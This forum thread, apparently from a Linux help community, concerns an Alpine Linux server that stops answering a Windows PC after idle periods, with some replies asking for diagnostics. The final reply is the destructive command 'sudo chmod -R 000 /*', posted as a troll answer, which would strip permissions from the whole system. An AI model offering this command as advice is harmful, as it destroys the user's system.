So I have an issue with my Alpine Linux system. It's set up quite minimally, just running Copyparty and a couple other things. I don't think that's super important. I don't have really anything installed that isn't important for running my services, so I don't even have stuff like UFW enabled. It is not attached to a display, all my access to it is via SSH.

The problem is this: When I try to ssh, ping, or view my Copyparty server from my PC, it doesn't work. From my phone, laptop, or Steam Deck it works fine. I used icpdump to see that it is in fact receiving my pings, but chooses to reject them for some bewildering reason. What's even stranger, if I ssh in from my phone, start icpdump then start pinging from my computer, usually by the third ping it starts right up and all functions work as intended. Then if I let it sit for five minutes without interacting with it I can't interact with it any more. This is a really weird issue, and I'm pretty sure it's on the Linux device's end, not the PC's.

A while back I was messing with using Tailscale but couldn't get it to work on my phone, so I uninstalled it from all the devices and to my knowledge nothing is left.

The PC runs Windows 11 if that's somehow relevant.

I assume you mean Tcpdump. What does it say?

The fact that all other devices can connect just fine would suggest otherwise - what are you using to connect from your pc?

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
